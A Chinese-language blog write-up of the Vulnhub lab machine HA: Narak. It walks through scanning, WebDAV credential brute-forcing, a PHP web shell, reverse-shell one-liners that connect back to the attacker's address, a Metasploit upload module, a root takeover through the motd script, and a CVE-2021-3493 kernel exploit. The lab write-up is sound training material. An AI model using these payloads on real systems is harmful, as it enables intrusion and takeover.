<!doctype html><html lang=zh-cn itemscope itemtype=http://schema.org/WebPage><head><meta name=generator content="Hugo 0.121.2"><meta charset=utf-8><title>靶机：HA_NARAK · echo</title>
<meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name=description content="一、靶机概述 1 靶机描述 所属系列：HA（此系列共17台） 难度等级：中等 达成目标：取得 root 权限 + 2 Flag 备注信息：使用 VMware 虚拟机运行 2 下载地址 https://www.vulnhub.com/entry/ha-narak,569/ 二、信息"><meta name=keywords content="Hugo,Photography,Computer"><link rel=canonical href=https://www.inecho.cc/zh-cn/2024/03/10/%E9%9D%B6%E6%9C%BAha_narak/><link rel=stylesheet href=https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css integrity=sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO crossorigin=anonymous><link rel=stylesheet href=https://use.fontawesome.com/releases/v5.2.0/css/all.css integrity=sha384-hWVjflwFxL6sNzntih27bfxkr27PmbbK/iSvJ+a4+0owXq79v+lsFkW54bOGbiDQ crossorigin=anonymous><link rel=stylesheet href=https://www.inecho.cc/css/den.css></head><body><div class=header-container style=background:linear-gradient(rgba(0,0,0,.2),rgba(0,0,0,.2)),url(https://www.inecho.cc/images/background.jpg);background-position:50%;background-size:cover><div class=container><nav class="header-nav navbar navbar-expand-md navbar-dark light-dark"><div class="header-logo navbar-brand"><a class=float-left href=https://www.inecho.cc/zh-cn/><img class="mr20 header-logo-image" src=https://www.inecho.cc/images/globe.svg alt=logo>
echo</a></div><button class=navbar-toggler type=button data-toggle=collapse data-target=#navbarNav aria-controls=navbarNav aria-expanded=false aria-label="Toggle navigation">
<span class=navbar-toggler-icon></span></button><div class="nav-menu collapse navbar-collapse" id=navbarNav><ul class=navbar-nav><li class=nav-item><a class=nav-link href=https://www.inecho.cc/zh-cn/category/ideas/>思考</a></li><li class=nav-item><a class=nav-link href=https://www.inecho.cc/zh-cn/category/photography/>摄影</a></li><li class=nav-item><a class=nav-link href=https://www.inecho.cc/zh-cn/category/computer/>计算机</a></li><li class=nav-item><a class=nav-link href=https://www.inecho.cc/zh-cn/about/>关于</a></li><li class=nav-item><a class=nav-link href=https://www.inecho.cc/en/><i class="fas fa-globe"></i> English</a></li></ul></div></nav></div><div class="container header-wrapper"><div class=row><div class=col-lg-12><div class=header-content><h1 class=header-title>靶机：HA_NARAK</h1><p class=header-date>作者：
Jack /
2024-03-10
/ 分类：
<a href=https://www.inecho.cc/zh-cn/category/computer/>computer</a></p><div class=header-underline></div><div class=clearfix></div><p class="float-right header-tags"><i class="fas fa-tags" aria-hidden=true></i>
<a href=https://www.inecho.cc/zh-cn/tag/vulnhub/>Vulnhub</a></p></div></div></div></div></div><main><div class="container content"><article><h2 id=一靶机概述>一、靶机概述</h2><h3 id=1-靶机描述>1 靶机描述</h3><p>所属系列：<a href=https://www.vulnhub.com/series/ha,242/>HA</a>（此系列共17台）</p><p>难度等级：中等</p><p>达成目标：取得 root 权限 + 2 Flag</p><p>备注信息：使用 VMware 虚拟机运行</p><h3 id=2-下载地址>2 下载地址</h3><p><a href=https://www.vulnhub.com/entry/ha-narak,569/>https://www.vulnhub.com/entry/ha-narak,569/</a></p><h2 id=二信息收集>二、信息收集</h2><h3 id=1-主机发现>1 主机发现</h3><p>使用 arp-scan 找到局域网内的靶机</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>┌──<span class=o>(</span>root㉿kali<span class=o>)</span>-<span class=o>[</span>~<span class=o>]</span>
</span></span><span class=line><span class=cl>└─# arp-scan --interface eth0 10.4.7.0/24
</span></span><span class=line><span class=cl>Interface: eth0, type: EN10MB, MAC: 00:0c:29:df:79:90, IPv4: 10.4.7.152
</span></span><span class=line><span class=cl>Starting arp-scan 1.10.0 with <span class=m>256</span> hosts <span class=o>(</span>https://github.com/royhills/arp-scan<span class=o>)</span>
</span></span><span class=line><span class=cl>10.4.7.1        00:50:56:c0:00:08       VMware, Inc.
</span></span><span class=line><span class=cl>10.4.7.2        00:50:56:ee:6e:ca       VMware, Inc.
</span></span><span class=line><span class=cl>10.4.7.153      00:0c:29:2c:4c:b4       VMware, Inc.
</span></span><span class=line><span class=cl>10.4.7.254      00:50:56:fc:41:8b       VMware, Inc.
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=m>4</span> packets received by filter, <span class=m>0</span> packets dropped by kernel
</span></span><span class=line><span class=cl>Ending arp-scan 1.10.0: <span class=m>256</span> hosts scanned in 2.024 seconds <span class=o>(</span>126.48 hosts/sec<span class=o>)</span>. <span class=m>4</span> responded
</span></span></code></pre></div><p>确定靶机为 <code>10.4.7.153 00:0c:29:2c:4c:b4 VMware, Inc.</code></p><h3 id=2-主机扫描>2 主机扫描</h3><h4 id=21-端口扫描>2.1 端口扫描</h4><p>使用 nmap 扫描主机主要的全部信息</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>┌──<span class=o>(</span>root㉿kali<span class=o>)</span>-<span class=o>[</span>~<span class=o>]</span>
</span></span><span class=line><span class=cl>└─# nmap -A 10.4.7.153
</span></span><span class=line><span class=cl>Starting Nmap 7.94SVN <span class=o>(</span> https://nmap.org <span class=o>)</span> at 2024-03-10 04:17 EDT
</span></span><span class=line><span class=cl>Nmap scan report <span class=k>for</span> bogon <span class=o>(</span>10.4.7.153<span class=o>)</span>
</span></span><span class=line><span class=cl>Host is up <span class=o>(</span>0.00073s latency<span class=o>)</span>.
</span></span><span class=line><span class=cl>Not shown: <span class=m>998</span> closed tcp ports <span class=o>(</span>reset<span class=o>)</span>
</span></span><span class=line><span class=cl>PORT   STATE SERVICE VERSION
</span></span><span class=line><span class=cl>22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class=o>(</span>Ubuntu Linux<span class=p>;</span> protocol 2.0<span class=o>)</span>
</span></span><span class=line><span class=cl><span class=p>|</span> ssh-hostkey: 
</span></span><span class=line><span class=cl><span class=p>|</span>   <span class=m>2048</span> 71:bd:59:2d:22:1e:b3:6b:4f:06:bf:83:e1:cc:92:43 <span class=o>(</span>RSA<span class=o>)</span>
</span></span><span class=line><span class=cl><span class=p>|</span>   <span class=m>256</span> f8:ec:45:84:7f:29:33:b2:8d:fc:7d:07:28:93:31:b0 <span class=o>(</span>ECDSA<span class=o>)</span>
</span></span><span class=line><span class=cl><span class=p>|</span>_  <span class=m>256</span> d0:94:36:96:04:80:33:10:40:68:32:21:cb:ae:68:f9 <span class=o>(</span>ED25519<span class=o>)</span>
</span></span><span class=line><span class=cl>80/tcp open  http    Apache httpd 2.4.29 <span class=o>((</span>Ubuntu<span class=o>))</span>
</span></span><span class=line><span class=cl><span class=p>|</span>_http-title: HA: NARAK
</span></span><span class=line><span class=cl><span class=p>|</span>_http-server-header: Apache/2.4.29 <span class=o>(</span>Ubuntu<span class=o>)</span>
</span></span><span class=line><span class=cl>MAC Address: 00:0C:29:2C:4C:B4 <span class=o>(</span>VMware<span class=o>)</span>
</span></span><span class=line><span class=cl>Device type: general purpose
</span></span><span class=line><span class=cl>Running: Linux 3.X<span class=p>|</span>4.X
</span></span><span class=line><span class=cl>OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
</span></span><span class=line><span class=cl>OS details: Linux 3.2 - 4.9
</span></span><span class=line><span class=cl>Network Distance: <span class=m>1</span> hop
</span></span><span class=line><span class=cl>Service Info: OS: Linux<span class=p>;</span> CPE: cpe:/o:linux:linux_kernel
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>TRACEROUTE
</span></span><span class=line><span class=cl>HOP RTT     ADDRESS
</span></span><span class=line><span class=cl><span class=m>1</span>   0.73 ms bogon <span class=o>(</span>10.4.7.153<span class=o>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span class=line><span class=cl>Nmap <span class=k>done</span>: <span class=m>1</span> IP address <span class=o>(</span><span class=m>1</span> host up<span class=o>)</span> scanned in 14.11 seconds
</span></span></code></pre></div><h4 id=22-网站探测>2.2 网站探测</h4><p>nmap 扫描已知开放了80端口，访问10.4.7.153，发现存在一个网站</p><p><img src=img/20240310162816.png alt=image.png></p><p>但是没有发现什么有价值的内容，那就直接对网站进行目录爆破，使用 gobuster 对网站目录进行详细的爆破扫描</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl><span class=c1># -r 对出现的每一条目录进行递归扫描 -t 设置扫描线程 -e 显示HTTP状态码</span>
</span></span><span class=line><span class=cl>┌──<span class=o>(</span>root㉿kali<span class=o>)</span>-<span class=o>[</span>~<span class=o>]</span>
</span></span><span class=line><span class=cl>└─# gobuster dir -r -u http://10.4.7.153 -x txt,html,php -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t <span class=m>100</span> -e
</span></span><span class=line><span class=cl><span class=o>===============================================================</span>
</span></span><span class=line><span class=cl>Gobuster v3.6
</span></span><span class=line><span class=cl>by OJ Reeves <span class=o>(</span>@TheColonial<span class=o>)</span> <span class=p>&amp;</span> Christian Mehlmauer <span class=o>(</span>@firefart<span class=o>)</span>
</span></span><span class=line><span class=cl><span class=o>===============================================================</span>
</span></span><span class=line><span class=cl><span class=o>[</span>+<span class=o>]</span> Url:                     http://10.4.7.153
</span></span><span class=line><span class=cl><span class=o>[</span>+<span class=o>]</span> Method:                  GET
</span></span><span class=line><span class=cl><span class=o>[</span>+<span class=o>]</span> Threads:                 <span class=m>100</span>
</span></span><span class=line><span class=cl><span class=o>[</span>+<span class=o>]</span> Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
</span></span><span class=line><span class=cl><span class=o>[</span>+<span class=o>]</span> Negative Status codes:   <span class=m>404</span>
</span></span><span class=line><span class=cl><span class=o>[</span>+<span class=o>]</span> User Agent:              gobuster/3.6
</span></span><span class=line><span class=cl><span class=o>[</span>+<span class=o>]</span> Extensions:              txt,html,php
</span></span><span class=line><span class=cl><span class=o>[</span>+<span class=o>]</span> Follow Redirect:         <span class=nb>true</span>
</span></span><span class=line><span class=cl><span class=o>[</span>+<span class=o>]</span> Expanded:                <span class=nb>true</span>
</span></span><span class=line><span class=cl><span class=o>[</span>+<span class=o>]</span> Timeout:                 <span class=nv>10s</span>
</span></span><span class=line><span class=cl><span class=o>===============================================================</span>
</span></span><span class=line><span class=cl>Starting gobuster in directory enumeration <span class=nv>mode</span>
</span></span><span class=line><span class=cl><span class=o>===============================================================</span>
</span></span><span class=line><span class=cl>http://10.4.7.153/.php                 <span class=o>(</span>Status: 403<span class=o>)</span> <span class=o>[</span>Size: 275<span class=o>]</span>
</span></span><span class=line><span class=cl>http://10.4.7.153/tips.txt             <span class=o>(</span>Status: 200<span class=o>)</span> <span class=o>[</span>Size: 58<span class=o>]</span>
</span></span><span class=line><span class=cl>http://10.4.7.153/index.html           <span class=o>(</span>Status: 200<span class=o>)</span> <span class=o>[</span>Size: 2998<span class=o>]</span>
</span></span><span class=line><span class=cl>http://10.4.7.153/.html                <span class=o>(</span>Status: 403<span class=o>)</span> <span class=o>[</span>Size: 275<span class=o>]</span>
</span></span><span class=line><span class=cl>http://10.4.7.153/images               <span class=o>(</span>Status: 200<span class=o>)</span> <span class=o>[</span>Size: 4563<span class=o>]</span>
</span></span><span class=line><span class=cl>http://10.4.7.153/webdav               <span class=o>(</span>Status: 401<span class=o>)</span> <span class=o>[</span>Size: 457<span class=o>]</span>
</span></span><span class=line><span class=cl>http://10.4.7.153/.html                <span class=o>(</span>Status: 403<span class=o>)</span> <span class=o>[</span>Size: 275<span class=o>]</span>
</span></span><span class=line><span class=cl>http://10.4.7.153/.php                 <span class=o>(</span>Status: 403<span class=o>)</span> <span class=o>[</span>Size: 275<span class=o>]</span>
</span></span><span class=line><span class=cl>http://10.4.7.153/server-status        <span class=o>(</span>Status: 403<span class=o>)</span> <span class=o>[</span>Size: 275<span class=o>]</span>
</span></span><span class=line><span class=cl>Progress: <span class=m>882240</span> / <span class=m>882244</span> <span class=o>(</span>100.00%<span class=o>)</span>
</span></span><span class=line><span class=cl><span class=o>===============================================================</span>
</span></span><span class=line><span class=cl><span class=nv>Finished</span>
</span></span><span class=line><span class=cl><span class=o>===============================================================</span>
</span></span></code></pre></div><p>先访问一下 http://10.4.7.153/tips.txt ，提示我们需要在 creds.txt 文件中发现线索</p><p><img src=img/20240310172842.png alt=image.png></p><p>但是在之前的 gobuster 扫描中没有扫描到 creds.txt 文件，这里查了一下别人打靶机的笔记，发现需要使用 nmap 进行 UDP 协议的端口扫描，但是我这里使用 <code>nmap -sU</code> 进行扫描后没有发现其他人笔记中写到的 69 端口 TFTP 服务。</p><p>接着访问一下 http://10.4.7.153/webdav ，可以看到需要用户名和密码登录，但是网站没有关于这点的任何提示。那就使用 <strong><a href=https://www.freebuf.com/articles/network/190128.html>kali-cewl 工具</a></strong> 先生成字典，再用 hydra 爆破。</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>cewl 10.4.7.153 -w pass.txt
</span></span></code></pre></div><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>hydra -L pass.txt -P pass.txt http-get://10.4.7.153/webdav
</span></span></code></pre></div><p><img src=img/20240310174552.png alt=image.png></p><p>爆破成功，得到用户名和密码</p><pre tabindex=0><code>login: yamdoot
password: Swarg
</code></pre><p><img src=img/20240310174722.png alt=image.png></p><p>登录成功后打开发现没有任何有用的文件，但是 webdav 是可以上传文件的</p><h2 id=三getshell>三、GetShell</h2><h3 id=1-上传反弹shell>1 上传反弹shell</h3><p>关于使用 webdav 协议上传反弹 shell 有很多姿势</p><h4 id=11-cadaver-工具上传>1.1 cadaver 工具上传</h4><p>我们可以通过 cadaver 工具登录 webdav 上传 shell 文件</p><pre tabindex=0><code>cadaver http://10.4.7.153/webdav
</code></pre><pre tabindex=0><code>put /root/Desktop/getshell.php
</code></pre><p><img src=img/20240310180639.png alt=image.png></p><p>反弹shell、一句话木马我尝试了很多，但是无论是 nc 还是蚁剑都连接不上，只有 system() 可以使用</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-php data-lang=php><span class=line><span class=cl><span class=o>&lt;?</span><span class=nx>php</span> <span class=nx>system</span><span class=p>(</span><span class=nv>$_GET</span><span class=p>[</span><span class=s1>&#39;cmd&#39;</span><span class=p>]);</span><span class=cp>?&gt;</span><span class=err>
</span></span></span></code></pre></div><p><img src=img/20240310183722.png alt=image.png></p><p>尝试在这里使用反弹shell连接</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-php data-lang=php><span class=line><span class=cl><span class=nx>php</span> <span class=o>-</span><span class=nx>r</span> <span class=s1>&#39;$sock=fsockopen(&#34;10.4.7.152&#34;,4444);$proc=proc_open(&#34;/bin/sh -i&#34;, array(0=&gt;$sock, 1=&gt;$sock, 2=&gt;$sock),$pipes);&#39;</span>
</span></span></code></pre></div><p>or</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=n>python3</span> <span class=o>-</span><span class=n>c</span> <span class=s1>&#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#34;10.4.7.152&#34;,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&#34;/bin/sh&#34;,&#34;-i&#34;]);&#39;</span>
</span></span></code></pre></div><p><img src=img/20240310184345.png alt=image.png></p><p>连接成功，先获取一下 pty</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=n>python3</span> <span class=o>-</span><span class=n>c</span> <span class=s2>&#34;import pty;pty.spawn(&#39;/bin/bash&#39;)&#34;</span>
</span></span></code></pre></div><p><img src=img/20240310184757.png alt=image.png></p><h4 id=12-msfconsole>1.2 msfconsole</h4><pre tabindex=0><code>search webdav
use exploit/windows/http/xampp_webdav_upload_php
show options
set USERNAME yamdoot
set PASSWORD Swarg
set RHOST 10.4.7.153
exploit
</code></pre><p>运行 payload 之后即可在 webdav 目录下成功上传一个 反弹shell 脚本</p><p><img src=img/20240310191514.png alt=image.png></p><p>需要点击它才可以在 msf 中连接</p><p><img src=img/20240310191559.png alt=image.png></p><h3 id=2-获取flag>2 获取FLAG</h3><p>在 /home/inferno 目录下发现第一个 flag</p><p><img src=img/20240310191826.png alt=image.png></p><h2 id=四提权>四、提权</h2><h3 id=1-ssh登录>1 ssh登录</h3><p>先进行一下靶机内部的信息收集</p><p>在 /mnt 目录下发现一个加密的文件 /mnt/hell.sh，密文如下</p><pre tabindex=0><code>--[-----&gt;+&lt;]&gt;---.+++++.+.+++++++++++.--.+++[-&gt;+++&lt;]&gt;++.++++++.--[---&gt;+&lt;]&gt;--.-----.++++.
</code></pre><p><img src=img/20240310192401.png alt=image.png></p><p>这其实就是使用混淆加密算法Brainfuck加密的，解密一下</p><p><img src=img/20240310192638.png alt=image.png></p><p>得到密文 chitragupt ，猜测应该是某一项服务的密码，从之前 flag 所属的用户可以推测密码应该是属于 inferno 用户的，再结合之前端口扫描时探测到的ssh服务，尝试登录一下</p><p><img src=img/20240310193034.png alt=image.png></p><h3 id=2-提权>2 提权</h3><p>该靶机提权的方式有很多种，这里演示几种</p><h4 id=21-motd-提权>2.1 motd 提权</h4><p>motd是负责 ssh 登录后，页面欢迎语提示语的，用户可以通过配置文件自定义欢迎提示信息。具体配置文件在 /etc/update-motd.d/* ，理论上这个目录下的任意文件都可以。通常修改 00-header 文件即可。</p><p>查看 /etc/update-motd.d/00-header 文件是否具有所需的权限</p><pre tabindex=0><code>ls -al /etc/update-motd.d/00-header
</code></pre><p><img src=img/20240310193949.png alt=image.png></p><p>写入提权脚本，这里有两种思路，一种是直接反弹shell，利用python等脚本。另一种是把修改root密码的脚本写入该文件即可</p><pre tabindex=0><code>echo &#34;echo &#39;root:123456&#39; | sudo chpasswd&#34; &gt;&gt; /etc/update-motd.d/00-header
</code></pre><p>然后退出 ssh 再次登录，然后即可切换到 root 用户以提权</p><p><img src=img/20240310194300.png alt=image.png></p><hr><p>当然这里我们也可以使用脚本探测当前系统下有哪些文件具有可以用来提权的权限</p><p>脚本的项目地址：https://github.com/carlospolop/PEASS-ng</p><pre tabindex=0><code>python3 -m http.server 80
</code></pre><p><img src=img/20240310195501.png alt=image.png></p><p><img src=img/20240310195637.png alt=image.png></p><hr><h4 id=22-内核漏洞提权>2.2 内核漏洞提权</h4><p>先查看内核版本和系统发行版本</p><p><img src=img/20240310200928.png alt=image.png></p><p>搜索可以提权的漏洞，我这里使用的是<a href=https://github.com/briskets/CVE-2021-3493>CVE-2021-3493</a>，该漏洞可以对 Ubuntu 20.10 以下的版本提权</p><p>下载到本地后，先编译成可执行文件，然后再下载到靶机上</p><p><img src=img/20240310201431.png alt=image.png></p><p><img src=img/20240310202316.png alt=image.png></p><p>赋权执行的时候发现，靶机中的 GNU C 库版本太低，解决方式使用相同版本的依赖库编译，或者在编译的时候将文件运行所需的依赖全部编译进去。我这里选择的是后者</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>gcc -static -o exp exploit.c
</span></span></code></pre></div><p><img src=img/20240310202721.png alt=image.png></p><p><img src=img/20240310202644.png alt=image.png></p><p>至此，提权成功</p></article><div class=author-card><div class=underline></div><div class=author-box><div class=author-image><a href=/zh-cn><img src=/images/avatar.jpg alt=Jack></a></div><div class=author-content><p class=author-title>作者</p><p class=author-name>Jack</p><p class=author-desc>网络安全从业者，不知名三分熟摄影师。喜欢探索新领域，对摄影、电影和运动有极大兴趣，平时喜欢折腾一些无用但又有趣的东西。</p></div></div></div></div></main><div class="footer gradient-2"><div class="container footer-container"><div class=row><div class="col-xs-4 col-sm-3 col-md-3 col-lg-3"><div class=footer-title>网站地图</div><ul class=list-unstyled><li><a href=https://www.inecho.cc/zh-cn/tags/>标签</a></li><li><a href=https://www.inecho.cc/zh-cn/categories/>分类</a></li><li><a rel=alternate type=application/rss+xml href=https://www.inecho.cc/zh-cn/index.xml><i class="fas fa-rss-square"></i> RSS 订阅</a></li></ul></div><div class="col-xs-4 col-sm-3 col-md-3 col-lg-3"><div class=footer-title>社群</div><ul class=list-unstyled><li><a href=https://github.com/shaform/hugo-theme-den/ rel=noopener target=_blank>GitHub</a></li></ul></div><div class="col-xs-4 col-sm-3 col-md-3 col-lg-3"><div class=footer-title>连结</div><ul class=list-unstyled><li><a href=https://www.princesses.cc/ rel=noopener target=_blank>Princesses</a></li></ul></div><div class="col-xs-12 col-sm-3 col-md-3 col-lg-3"><p class="pull-right text-right"><small><em>Proudly powered by <a href=https://gohugo.io/ rel=noopener target=_blank>Hugo</a></em></small><br><small><em>Theme - <a href=https://github.com/shaform/hugo-theme-den rel=noopener target=_blank>Den</a></em></small><br><small>&copy;
Jack
2024</small></p></div></div></div></div><script src=https://code.jquery.com/jquery-3.3.1.slim.min.js integrity=sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo crossorigin=anonymous></script><script src=https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js integrity=sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49 crossorigin=anonymous></script><script src=https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js integrity=sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy crossorigin=anonymous></script></body></html>